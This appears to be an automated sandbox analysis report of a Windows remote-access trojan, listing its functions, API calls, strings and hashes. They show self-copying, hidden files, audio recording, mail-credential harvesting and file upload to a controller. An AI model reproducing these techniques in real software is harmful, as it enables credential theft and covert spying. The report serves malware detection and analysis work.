                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$Write$Create
                                                                                                                                                                    • String ID: RIFF$WAVE$data$fmt
                                                                                                                                                                    • API String ID: 1602526932-4212202414
                                                                                                                                                                    • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                                                                                                                    • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                                                                                                                                    • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                                                                                                                                    • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\Public\Libraries\lhgtogaW.pif,00000001,0040764D,C:\Users\Public\Libraries\lhgtogaW.pif,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: C:\Users\Public\Libraries\lhgtogaW.pif$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                                                    • API String ID: 1646373207-3736926029
                                                                                                                                                                    • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                                                                                                    • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                                                                                                                                    • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                                                                                                                                    • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 274C1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D1B
                                                                                                                                                                      • Part of subcall function 274C1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 274C1D37
                                                                                                                                                                      • Part of subcall function 274C1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 274C1D4B
                                                                                                                                                                    • _strlen.LIBCMT ref: 274C1855
                                                                                                                                                                    • _strlen.LIBCMT ref: 274C1869
                                                                                                                                                                    • _strlen.LIBCMT ref: 274C188B
                                                                                                                                                                    • _strlen.LIBCMT ref: 274C18AE
                                                                                                                                                                    • _strlen.LIBCMT ref: 274C18C8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                    • API String ID: 3296212668-3023110444
                                                                                                                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                    • Instruction ID: 98383f53a3acb96271c21958b3e3a18b9e2cb06bbf1f2748e574821089abd1d6
                                                                                                                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C6126B9D00618AFEF12CBA4CC40BDEB7BAAF66600F50409ED604AB354DB745A46CF57
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040CE07
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\Public\Libraries\lhgtogaW.pif,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040CEE6
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                                                                                                                                    • CopyFileW.KERNEL32(C:\Users\Public\Libraries\lhgtogaW.pif,00000000,00000000), ref: 0040CF84
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040CFC6
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D062
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                                                    • String ID: 6$C:\Users\Public\Libraries\lhgtogaW.pif$del$open
                                                                                                                                                                    • API String ID: 1579085052-888387931
                                                                                                                                                                    • Opcode ID: a282633b3eac4cb8793c6ba94642ff3c36b85cc43f0b99bb842e1a173778b4e4
                                                                                                                                                                    • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                                                                                                                                    • Opcode Fuzzy Hash: a282633b3eac4cb8793c6ba94642ff3c36b85cc43f0b99bb842e1a173778b4e4
                                                                                                                                                                    • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0041C036
                                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0041C067
                                                                                                                                                                    • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                                                                                                                                    • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                                                                                                                                    • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                                                                                                                                    • _wcslen.LIBCMT ref: 0041C13B
                                                                                                                                                                    • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041C173
                                                                                                                                                                    • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                                                                                                                                    • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041C1D0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                                                    • String ID: ?
                                                                                                                                                                    • API String ID: 3941738427-1684325040
                                                                                                                                                                    • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                                                                                                                    • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 274C19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4157217580.00000000274C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 274C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4157199941.00000000274C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4157217580.00000000274D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_274c0000_lhgtogaW.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                    • API String ID: 4218353326-230879103
                                                                                                                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                    • Instruction ID: 86087b31e73829a109176817856f8085a32818b8a4ee3a13ec72a7512e0da130
                                                                                                                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                    • Instruction Fuzzy Hash: C0716AB9C006289BCF12DBB48C84AEF7BFC9F55A00F50009EEA44D7241EA74D785CBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3899193279-0
                                                                                                                                                                    • Opcode ID: 138887d55368f9cf58208da3f492a4fc17d417063cec38a58e843e9613042db9
                                                                                                                                                                    • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                                                                                                                                    • Opcode Fuzzy Hash: 138887d55368f9cf58208da3f492a4fc17d417063cec38a58e843e9613042db9
                                                                                                                                                                    • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                                                                    • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                                                                    • API String ID: 2490988753-744132762
                                                                                                                                                                    • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                                                                                                                    • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                                                                                                                                    • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                                                                                                                                    • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0041D5E9
                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                                                                                                                                    • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0041D665
                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 0041D66B
                                                                                                                                                                    • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                                                    • String ID: Close
                                                                                                                                                                    • API String ID: 1657328048-3535843008
                                                                                                                                                                    • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                                                                                                    • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                                                                                                                                    • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                                                                                                                                    • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2509303402-0
                                                                                                                                                                    • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                                                                                                                    • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                                                                                                                                    • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 00408D4D
                                                                                                                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                                                    • API String ID: 3086580692-2582957567
                                                                                                                                                                    • Opcode ID: 392b21deea310a1671e8a27760ce354b49806b519abc882ab8ae47c583445ee5
                                                                                                                                                                    • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                                                                                                                                    • Opcode Fuzzy Hash: 392b21deea310a1671e8a27760ce354b49806b519abc882ab8ae47c583445ee5
                                                                                                                                                                    • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                                                                                                                      • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                                                                                                                    • _free.LIBCMT ref: 004512FF
                                                                                                                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                                                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                                                                                                    • _free.LIBCMT ref: 00451321
                                                                                                                                                                    • _free.LIBCMT ref: 00451336
                                                                                                                                                                    • _free.LIBCMT ref: 00451341
                                                                                                                                                                    • _free.LIBCMT ref: 00451363
                                                                                                                                                                    • _free.LIBCMT ref: 00451376
                                                                                                                                                                    • _free.LIBCMT ref: 00451384
                                                                                                                                                                    • _free.LIBCMT ref: 0045138F
                                                                                                                                                                    • _free.LIBCMT ref: 004513C7
                                                                                                                                                                    • _free.LIBCMT ref: 004513CE
                                                                                                                                                                    • _free.LIBCMT ref: 004513EB
                                                                                                                                                                    • _free.LIBCMT ref: 00451403
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000001.1717466391.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_1_400000_lhgtogaW.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                    • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                                                    • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                                                                                                                    • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
